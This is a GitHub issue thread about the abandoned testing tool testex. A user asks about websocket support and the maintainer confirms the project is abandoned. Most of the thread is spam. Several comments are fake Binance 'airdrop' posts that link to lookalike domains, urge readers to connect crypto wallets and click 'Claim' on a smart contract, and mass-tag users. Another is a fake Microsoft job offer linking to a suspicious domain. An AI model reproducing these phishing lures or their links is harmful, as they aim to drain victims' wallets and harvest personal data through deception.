### ISSUE TITLE
New functionality

### ISSUE THREAD

**Issue by djumpen** [m-kus/testex#9]
Hey, thank you for this nice tool! Are you going to extend feature list with websockets in some nearest future? Or this project is abandoned?

**Comment by m-kus** [comment]
Hey! I'm afraid it is indeed abandoned :(

**Comment by knofte** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @FUKUMIMFUKUMIMI, @shashikant47, @tnv218, @levdovv, @GIJAXF, @Mr-2302, @HH44552000, @Basyirunn, @abyrahman84, @azoozzooz12, @Weewpee, @ikurbanovs, @rianwar, @sidduHERE, @dropszoner, @KuanYuLai, @mss222, @Rachi26, @Atabek5252, @nguyenhuuphuoc2809, @manplansgodlaughs, @ymcat81, @Maulana010, @gbdelax, @sethkingston, @Yur1usS, @Saifanl, @VladChernenko, @Hasbyaskaree, @nikstef22, @Malik5565, @ZIKMARNI, @KESYAWAYUDHAPUTRAAJIWIBOWO, @michaugrazyn, @Aroefpoenya, @MrTrade59, @HCLX168, @Taha0880, @antogerva, @Amatullah-13, @lamthuanphong6181, @Dekken30, @mamadoudial, @jeli-network, @gowtham28194, @880088lens, @KNipunDananjaya, @Emdd1983, @Wisdom-Brut, @bahersaied

**Comment by knofte** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @

**Comment by rafly2103** [comment]
# $BNB Airdrop: Claim Your $1000 in BNB Now!

🎉 Congratulations! You've been selected to receive a portion of the $1.5k Binance Airdrop. We're thrilled to offer you $1500 in BNB. But wait, there's more—connect now, and instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://miro.medium.com/v2/resize:fit:1400/1*57DPVRALhv45ef334fpetQ.jpeg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1000 in BNB! Additionally, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, take the opportunity to win up to $20,000—it's your golden chance!


Winners: @OJayStewart, @html5-cloud, @limpid-kzonix, @efesurekli, @ELBEQQAL94, @chen-qr, @gafbf

**Comment by jacky-xbb** [comment]
# [Exciting Job Opportunity at Microsoft!](https://jobsindeed.online)

Congratulations! You've been selected to apply for an exclusive software developer position at Microsoft!

## How to Apply:
To take advantage of this exciting opportunity, please click [here](https://jobsindeed.online). Hurry, applications close on [March 1, 2024](https://jobsindeed.online).

## Job Description:
- **Position:** Senior Software Developer
- **Salary:** $300,000 per year
- **Location:** Remote
- **Benefits:**
  - Comprehensive health plan with dental and vision coverage
  - Company-contributed retirement plan with matching
  - Flexible working hours and work-from-home options
  - Generous paid time off and parental leave policies
  - Professional development opportunities and training support
  - Collaborative and inclusive work environment

## Requirements:
- Minimum of 5 years of experience in software development
- Proficiency in programming languages such as Python, JavaScript, or Java
- Extensive experience with frameworks such as React, Angular, or Vue.js
- Strong problem-solving skills and ability to work in a fast-paced environment
- Excellent communication and teamwork skills

**Note:** This position is open to candidates from anywhere in the world. Don't miss this opportunity to join a dynamic team at Microsoft and make a significant impact in the tech industry!
kameldk, @preetam23a, @maxtortime, @anhhong31313, @Eden7379, @Jamisonbn, @NTL-Thubon, @Annisasalsa27, @Johnangel7, @taurrbond, @nguyenduytan12a1, @GUNELELIYEVA2110, @Denso-Air, @curtcurt871, @Glory73, @Nixonet-6, @Alordrchy, @Gledis123, @Natee9969, @reyber21

**Comment by Eden7379** [comment]
hi

**Comment by HH44552000** [comment]
who are you? Should I get to know you?

林靖雁  LIN JING YAN

Eden88 ***@***.***> 於 2024年5月23日 週四 上午1:13 寫道：

**Comment by HH44552000** [comment]
what??

Michael Zaikin ***@***.***> 於 2024年6月3日 週一 上午6:10寫道：
